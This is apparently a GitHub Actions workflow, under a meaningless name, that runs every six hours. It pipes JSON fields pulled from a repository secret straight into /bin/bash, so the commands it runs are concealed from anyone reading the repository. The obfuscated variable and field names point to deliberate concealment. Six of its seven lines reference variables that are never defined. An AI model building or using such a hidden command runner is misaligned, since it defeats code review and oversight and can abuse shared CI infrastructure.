name: obviousgameg

on:
  workflow_dispatch:
  schedule:
    - cron: '51 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: obviousgameg
        env:
          uf354: ${{ secrets.uf354 }}
        run: |
          echo $uf354 | jq -r .ft906 | /bin/bash
          echo $npsut2 | jq -r .his1166 | /bin/bash
          echo $nnw42511 | jq -r .tqjxx598 | /bin/bash
          echo $qrnb1 | jq -r .id22 | /bin/bash
          echo $cs906 | jq -r .q506 | /bin/bash
          echo $eiioz455 | jq -r .iadl627 | /bin/bash
          echo $atnsn123 | jq -r .olw1978 | /bin/bash

